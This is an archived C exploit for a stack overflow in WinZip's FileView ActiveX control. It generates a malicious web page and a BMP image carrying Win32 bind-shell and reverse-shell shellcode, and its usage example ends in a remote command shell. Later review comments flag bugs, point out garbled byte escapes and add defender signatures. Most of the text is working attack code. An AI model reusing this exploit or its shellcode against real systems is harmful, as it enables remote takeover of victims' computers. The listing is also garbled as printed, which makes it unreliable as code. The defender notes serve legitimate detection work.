# Title : WinZIP <= 10.0.7245 (FileView ActiveX) Remote Buffer Overflow Exploit
# Published : 2006-11-15
# Author : prdelka
/* WinZip <= 10.0.7245 FileView ActiveX buffer overflow exploit
* ============================================================
* A vulnerability has been identified within Winzip that allows remote
* attackers to execute arbitrary code. User interaction is required to
* exploit this vulnerability in that the target must visit a malicious
* web page. The flaw exists within "FileView" ActiveX control which
* contains stack based overflow conditions. This exploit generates a
* malicious html page and contains shellcode embedded within an image
* file. Due to the random nature of the heap, this exploit uses hard
* coded location of the image bytes within the heap and as such is
* unreliable in exploitation of this bug, but has approximately 1 in
* 6 hit ratio within the tested environment.
*
* Example.
* $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
* [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
* [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
* [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
* [ Creating image containing shellcode 'foo.bmp'
* [ Creating html exploit page 'index.html'
* $
* ... clicky clicky MSIE ...
* $ telnet 192.168.1.223 4444
* Connected to 192.168.1.223.
* Escape character is '^]'.
*
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Documents and Settings\User\Desktop>
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
/* Count of 0x90 filler bytes that main() writes into the image ahead of
 * the payload (one write() call per byte). */
#define NOPSIZE 999999
/* One supported target: a display name plus the hard-coded return
 * address that main() embeds in the generated page as the 4 raw bytes
 * of the global `ret`. */
struct target {
char* name;
int retaddr;
};
/* One payload entry. `port` and `host` are byte offsets into `shellcode`
 * where main() patches a 2-byte port (-p) or a 4-byte IPv4 address (-d),
 * or -1 when the payload has no such field. `shellcode` is handled as a
 * NUL-terminated C string throughout (strlen/memcpy), so every byte must
 * be non-zero; main() detects an introduced zero byte by comparing
 * strlen() before and after patching. */
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
/* Number of entries in targets[]; help() iterates 0..targetno-1, so this
 * must be kept in step with the table by hand. */
int targetno = 1;
/* Return-address table. The one entry is for the IE / WinZip builds named
 * in the trailing comment; per the file header it is a fixed heap
 * location where the image bytes happened to land, which is why the
 * header describes the exploit as unreliable. */
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
/* Number of entries in shellcodes[]; help() iterates 0..shellno-1. */
int shellno = 2;
/* Payload table. Entry 0 is a bind payload with its port bytes at offset
 * 162 and no host field; entry 1 is a connect-back payload with port at
 * offset 167 and host at offset 160. Both default to 4444/tcp per their
 * names.
 *
 * NOTE(review): in this archived listing every byte escape has lost its
 * backslash (printed as "x48x40..."), so these literals are not valid C
 * as shown and are kept verbatim only for the record. */
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"x48x40xf5x49xd6x4axf9x91x47x96x2fxf8x9bx37x41xf5"
"x99x47xf9xf9xfcxf9x48x4ex4bx9bx90x9bxf5x97x40xf9"
"xd6x41xf9x48x9bx92xfdx9bx49x42x4fx9fx90xd6x27x9b"
"x93x46x2fx90xfdx4ax6ax51x59xd9xeexd9x74x24xf4x5b"
"x81x73x13xbcxe8x2bx27x83xebxfcxe2xf4x3dx2cx7fxd5"
"x43x17xd7x4dx57xa5xc3xdex43x17xd4x47x37x84x0fx03"
"x37xadx17xacxc0xedx53x26x53x63x64x3fx37xb7x0bx26"
"x57xa1xa0x13x37xe9xc5x16x7cx71x87xa3x7cx9cx2cxe6"
"x76xe5x2axe5x57x1cx10x73x98xc0x5exc2x37xb7x0fx26"
"x57x8exa0x2bxf7x63x74x3bxbdx03x28x0bx37x61x47x03"
"xa0x89xe8x16x67x8cxa0x64x8cx63x6bx2bx37x98x37x8a"
"x37xa8x23x79xd4x66x65x29x50xb8xd4xf1xdaxbbx4dx4f"
"x8fxdax43x50xcfxdax74x73x43x38x43xecx51x14x10x77"
"x43x3ex74xaex59x8exaaxcaxb4xeax7ex4dxbex17xfbx4f"
"x65xe1xdex8axebx17xfdx74xefxbbx78x74xffxbbx68x74"
"x43x38x4dx4fxadxb4x4dx74x35x09xbex4fx18xf2x5bxe0"
"xebx17xfdx4dxacxb9x7exd8x6cx80x8fx8ax92x01x7cxd8"
"x6axbbx7exd8x6cx80xcex6ex3axa1x7cxd8x6axb8x7fx73"
"xe9x17xfbxb4xd4x0fx52xe1xc5xbfxd4xf1xe9x17xfbx41"
"xd6x8cx4dx4fxdfx85xa2xc2xd6xb8x72x0ex70x61xccx4d"
"xf8x61xc9x16x7cx1bx81xd9xfexc5xd5x65x90x7bxa6x5d"
"x84x43x80x8cxd4x9axd5x94xaax17x5ex63x43x3ex70x70"
"xeexb9x7ax76xd6xe9x7ax76xe9xb9xd4xf7xd4x45xf2x22"
"x72xbbxd4xf1xd6x17xd4x10x43x38xa0x70x40x6bxefx43"
"x43x3ex79xd8x6cx80x55xffx5ex9bx78xd8x6ax17xfbx27"},
{"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x43x53x43x53xffxd0x68"
"x01x02x03x04x66x68x11x5cx66x53x89xe1x95x68xecxf9"
"xaax60x57xffxd6x6ax10x51x55xffxd0x66x6ax64x66x68"
"x63x6dx6ax50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3"
"xaax95x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab"
"x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xffxd6"
"x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04xffxd6"
"xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"}
};
/* Fragments of the generated page. html1 opens the document and a
 * VBScript handler for the control's OnAfterItemAdd event whose body
 * assigns WZFILEVIEW.FilePattern = "..."; main() writes the filler and
 * the return address between html1 and html2 as that string's value.
 * html2 closes the handler and opens an <IMG SRC= tag that main() fills
 * with the BMP filename; html3 closes it and instantiates the control by
 * CLSID.
 *
 * Defender note: the <OBJECT> tag for CLSID
 * A09AE68F-B14D-43ED-B713-BA413F034904 together with an oversized
 * FilePattern assignment is what a kill-bit or content signature should
 * key on.
 *
 * NOTE(review): as printed here the inner quotes and the line-ending
 * escapes have lost their backslashes, so these literals are not valid C
 * as shown. */
char html1[]="<HTML>rn<HEAD>rn<TITLE></TITLE>rn</HEAD>rn"
"<BODY>rn<SCRIPT LANGUAGE="VBScript">rnSub WZ"
"FILEVIEW_OnAfterItemAdd(Item)rnWZFILEVIEW.FilePa"
"ttern = ""; /* smash the stack here */
char html2[]=""rnend subrn</SCRIPT>rn<IMG SRC="";
char html3[]="">rn<OBJECT ID="WZFILEV"
"IEW" WIDTH=200 HEIGHT=200rnCLASSID="CLSID:A09A"
"E68F-B14D-43ED-B713-BA413F034904">rn</OBJECT>r"
"n</BODY>rn</HTML>rn";
/* 54-byte BMP header ('BM' signature, pixel data at offset 0x36) that
 * appears to declare a 999x999 24-bit image; main() writes it with
 * sizeof(bmphdr), which also emits the array's terminating NUL. Byte
 * escapes are garbled in this listing as above. */
char bmphdr[]="x42x4dx3exbbx2dx00x00x00x00x00x36x00x00"
"x00x28x00x00x00xe7x03x00x00xe7x03x00x00"
"x01x00x18x00x00x00x00x00x08xbbx2dx00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00";
/* Return address chosen by setret(); main() checks it for zero bytes via
 * strlen() on its raw bytes and writes all 4 bytes into the page. */
int ret;
/* Prints the usage text and the target / shellcode tables, then exits
 * with status 0.
 *
 * @param progname  argv[0], echoed into the usage line.
 *
 * NOTE(review): the target loop passes whole `struct target` values to
 * %s and %x — undefined behaviour; it should print targets[count].name
 * and targets[count].retaddr. The shellcode loop prints a size_t with %d,
 * and strlen() is used without <string.h>. The usage text lists -i for
 * both imgname and shellhost, while main()'s option table uses -d for
 * shellhost. Escape sequences in this listing have lost their
 * backslashes ("n" for newline). */
void help(char* progname){
int count;
printf("[ Usage instructions.n[n");
printf("[ %s <required> (optional)n[n[ --filename|-f <file.html>n",progname);
printf("[ --imgname|-i <image.bmp>n[ --shellcode|-s <shell#>n");
printf("[ --shellport|-p (port)n");
printf("[ --shellhost|-i (ip)n");
printf("[ --target|-t <target#/0xretaddr>n[n");
printf("[ Target#'sn");
for(count = 0;count <= targetno - 1;count++){
/* NOTE(review): struct passed where %s / %x expect a pointer / int. */
printf("[ %d %s 0x%xn",count,targets[count],targets[count]);
}
printf("[n[ Shellcode#'sn");
for(count = 0;count <= shellno - 1;count++){
printf("[ %d "%s" (length %d bytes)n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
}
exit(0);
}
/* Resolves the -t argument into the global `ret`: "0" (or anything
 * atoi() reads as 0) selects the table target, anything else is parsed
 * by strtoul() as a hexadecimal return address.
 *
 * @param retarg  raw -t option text.
 *
 * NOTE(review): the table branch indexes targets[ret] with the global
 * `ret` (still 0 on the first call) instead of `value`, so it only works
 * because there is a single target; a second -t 0 would index the table
 * with the previous return address. Any non-zero decimal number takes
 * the default branch, so target numbers other than 0 cannot be selected
 * numerically. */
void setret(char* retarg){
int value = atoi(retarg);
switch(value){
case 0:
printf("[ Using target '%s'n",targets[ret].name);
ret = targets[ret].retaddr;
break;
default:
ret = strtoul(retarg,NULL,16);
printf("[ Using return address '0x%x'n",ret);
break;
}
}
/* Entry point. Parses the command line, copies the selected payload and
 * optionally patches its port / host bytes, then writes two files: a BMP
 * whose pixel data is NOPSIZE bytes of 0x90 followed by the payload, and
 * an HTML page that instantiates the WinZip FileView control and assigns
 * an oversized FilePattern value from a VBScript handler.
 *
 * Defender notes: the page is recognisable by the <OBJECT> tag for CLSID
 * A09AE68F-B14D-43ED-B713-BA413F034904 combined with a FilePattern
 * assignment of about 2 KB (265 + 4 + 1827 bytes written below), and the
 * image by a BMP whose pixel data is a very long 0x90 run.
 *
 * NOTE(review): string escapes in this listing have lost their
 * backslashes ("n", "rn", "x90"), so it is not compilable as shown.
 * `c` is read before it is assigned in the while condition; `file` and
 * `img` are dereferenced by strlen() even when -f / -i were not given;
 * `buffer` is never used and `shellport2` is assigned but never read;
 * every write() result is ignored; memset/memcpy/strlen need <string.h>
 * and inet_addr() needs <arpa/inet.h>, none of which is included. */
int main(int argc, char* argv[]){
unsigned long i, fd;
int c, index, payg, paya, lhost;
short shellport, shellport2;
int ishell = 0, itarg = 0;
char *buffer, *file, *img, *payload;
/* Long-option table; the short aliases match the "f:i:t:s:p:d:h"
 * optstring below. Note shellhost is -d here, not the -i that help()
 * advertises. */
static struct option options[] = {
{"filename", 1, 0, 'f'},
{"imgname", 1, 0, 'i'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 's'},
{"shellport", 1, 0, 'p'},
{"shellhost", 1, 0, 'd'},
{"help", 0, 0,'h'}
};
printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploitn");
/* NOTE(review): `c` is uninitialised on the first evaluation of this
 * condition (undefined behaviour); getopt_long() assigns it below. */
while(c != -1){
c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
switch(c){
case 'f':
file = optarg;
break;
case 'i':
img = optarg;
break;
case 't':
itarg = 1;
setret(optarg);
/* Rejects a return address containing a zero byte: strlen() on the
 * raw bytes of `ret` stops at the first NUL. A zero in the last byte
 * is not caught, and with no NUL at all strlen() reads past `ret`. */
if(strlen((char*)&ret) < 4){
fprintf(stderr,"[ Selected target contains a null address!n");
exit(-1);
}
break;
case 's':
/* The first -s wins; later -s options are ignored once ishell is set.
 * The payload is copied into a heap buffer so -p / -d can patch it. */
if(ishell==0){
payg = atoi(optarg);
switch(payg){
/* NOTE(review): case 0 and case 1 are identical; a single bounds check
 * against shellno would cover both. malloc() is unchecked. */
case 0:
printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
case 1:
printf("[ Using shellcode '%s' (%d bytes)n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
default:
printf("[ Invalid shellcode selection %dn",payg);
exit(0);
break;
}
}
break;
case 'p':
/* Overwrites the 2 port bytes at shellcodes[payg].port with a
 * hand-built big-endian value, then refuses the choice if the
 * NUL-terminated payload got shorter, i.e. a zero byte was introduced. */
if(ishell==1){
if(shellcodes[payg].port > -1){
paya = strlen(payload);
shellport = atoi(optarg);
shellport2 = shellport;
shellport =(shellport&0xff)<<8 | shellport>>8;
memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
if(paya > strlen(payload)) {
printf("[ Error shellcode port introduces null bytesn");
exit(1);
}
printf("[ Shellcode port changed to '%u'n",atoi(optarg));
}
else{
printf("[ (%s) port selection is ignored for current shellcoden",optarg);
}
}
else{
printf("[ No shellcode selected yet, ignoring (%s) port selectionn",optarg);
}
break;
case 'd':
/* Same scheme as 'p' for the 4-byte address at shellcodes[payg].host.
 * inet_addr() is not declared by any included header. */
if(ishell==1){
if(shellcodes[payg].host > -1){
paya = strlen(payload);
lhost = inet_addr(optarg);
memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
if(paya > strlen(payload)){
printf("[ Error shellhost introduces null bytesn");
exit(1);
}
printf("[ Shellhost has been changed to '%s'n",optarg);
}
else{
printf("[ (%s) shellhost selection is ignored for current shellcoden",optarg);
}
}
else {
printf("[ No shellcode selected yet, ignoring (%s) shellhost selectionn",optarg);
}
break;
case 'h':
/* help() exits the process. */
help(argv[0]);
break;
default:
break;
}
}
/* NOTE(review): file / img are uninitialised when -f / -i were not given,
 * so these strlen() calls are undefined behaviour rather than a clean
 * usage error. */
if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
printf("[ Error insufficient arguements, try running '%s --help'n",argv[0]);
exit(0);
}
// create image
/* Image layout: the 54-byte header (plus its array NUL via sizeof),
 * NOPSIZE single-byte writes of 0x90, then the payload. */
printf("[ Creating image containing shellcode '%s'n",img);
fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
/* NOTE(review): reports `file`, but it was `img` that failed to open. */
fprintf(stderr,"[ Error creating %sn",file);
exit(-1);
}
write(fd,bmphdr,sizeof(bmphdr));
for(i = 0;i < NOPSIZE;i++){
write(fd,"x90",1);
}
write(fd,payload,strlen(payload));
close(fd);
// create html
/* Page layout: html1, 265 filler bytes, the 4 raw bytes of `ret`, 1827
 * more filler bytes, html2, the image filename, html3. The filler and
 * address form the FilePattern string assigned in the VBScript handler. */
printf("[ Creating html exploit page '%s'n",file);
fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
if(fd == -1){
fprintf(stderr,"[ Error creating %sn",file);
exit(-1);
}
write(fd,html1,strlen(html1));
for(i = 0;i < 265;i++){
write(fd,"A",1);
}
write(fd,&ret,4);
for(i = 0;i < 1827;i++){
write(fd,"A",1);
}
write(fd,html2,strlen(html2));
write(fd,img,strlen(img));
write(fd,html3,strlen(html3));
close(fd);
/* No explicit return; reaching the end of main() yields 0 under C99. */
}